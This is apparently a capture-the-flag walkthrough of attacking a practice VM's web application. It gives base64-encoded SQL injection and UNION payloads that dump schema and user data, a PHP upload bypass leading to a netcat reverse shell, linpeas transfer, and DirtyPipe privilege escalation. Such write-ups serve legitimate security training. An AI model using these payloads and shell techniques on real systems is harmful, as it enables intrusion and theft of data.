Download the VM and start it. It has a web application hosted which is configured to boot at start so you can put the VM in the background. Simply find the address of the application and start pentesting.
Challenge Goal : Find the file flag.txt and read its content.
First we start by finding the IP of machine here i used the netdiscover command.
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $sudo netdiscover -r 192.168.1.12/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.4 **:**:**:**:**:** 1 60 CHONGQING FUGUI ELECTRONICS
192.168.1.1 **:**:**:**:**:** 1 60 Syrotech Networks. Ltd.
192.168.1.5 **:**:**:**:**:** 1 60 Intel Corporate
192.168.1.21 **:**:**:**:**:** 1 60 Intel Corporate
here 192.168.1.1 is ip of router.
we scane the IP 192.168.1.5,192.168.1.21 and the IP 192.168.1.21 have web service running at port 42710.
I use rustscan for port scaning in CTFs because it is insanely fast.
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $rustscan -a 192.168.1.21
File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 192.168.1.21:42710
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
...
opening this website we have nothing but this page:
First though was to look for robots.txt file but no luck so i did directory bruteforcing with gobuster.
now we have some interesting directories like Admin and search_result.
Admin page requires authentication Username and Password.
now this is something interesting there is link to
The Results of 2022 have not been published yet so let's try 2021 :
on submitting the form we have this response:
ID, Name, Roll, Marks it looks like it is fetching this data from sql database so lets try SQL injection.
this POST request have data=NjIxNzI5NTgx it base64 encoded value of 621729581.
lets try with simple payload ' OR 1=1 # but it is not working after few tries i tried 621729581 OR 1=1 base64 encode and it gives us all the entries hooray, and that is successful SQL injection.
payload=
data=<@base64>621729581 OR 1=1<@/base64>
<-- I'm using Hackvertor burp extension.
we know the number of columns it is 4 : ID, Name, Roll, Marks.So the payload for union attack would be:
payload:
data=<@base64>621729581 UNION SELECT NULL, NULL, NULL, NULL<@/base64>
It gives us the result in response so payload is correct and we also know the data types it should be Integer for ID, Roll, Marks and String for Name so we can put this values in payload.
payload:
data=<@base64>621729581 UNION SELECT 1, "name", 2, 3<@/base64>
response:
Now we can try to extract the databases'name, tables'name, columns'name.
payload:
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,schema_name,0x7c), 2, 3 fRoM information_schema.schemata<@/base64>
so we can only upload jpg file but how it is checking for file type extension? let's do one experiment rename the jpg file to php if error it is looking for extension and if successful it is checking MIME type.
Record updated successfullyThe file has been uploaded
so MIME type it is.
Record updated successfullyThe file has been uploaded and file is uploaded successfully but where ?
we have column name profile_picture in users table, if you remember that we still have SQLi.
payload=
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>
result = |../assets/uploads/simple.php|
so our file is at http://192.168.1.21:42710/assets/uploads/simple.php
we start listener: nc -lvnp 8888
and path= http://192.168.1.21:42710/assets/uploads/revshell.php
on visiting this file we have reverse shell:
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.12] from (UNKNOWN) [192.168.1.21] 38442
Linux heathrow-VirtualBox 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
23:44:47 up 2:01, 1 user, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
heathrow tty2 tty2 21:32 2:12m 0.03s 0.03s /usr/libexec/gnome-session-binary --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (732): Inappropriate ioctl for device
bash: no job control in this shell
www-data@heathrow-VirtualBox:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@heathrow-VirtualBox:/$
We have shell but we can't access /home/heathrow we need to escalate our privilege. first thing that comes in mind is linpeas.sh let's move that to victim machine i create local server with python python -m http.server 80, to transfer file because we normally don't have internet access in victim machine.
change permissions to +x : chmod +x linpeas.sh
Now run the file: ./linpeas.sh
Analyzing the output we have first suggestion for [CVE-2022-0847] DirtyPipe:
we follow the steps in GitHub repo and we have exploit-1, exploit-2. transfer this to victim machine and run.
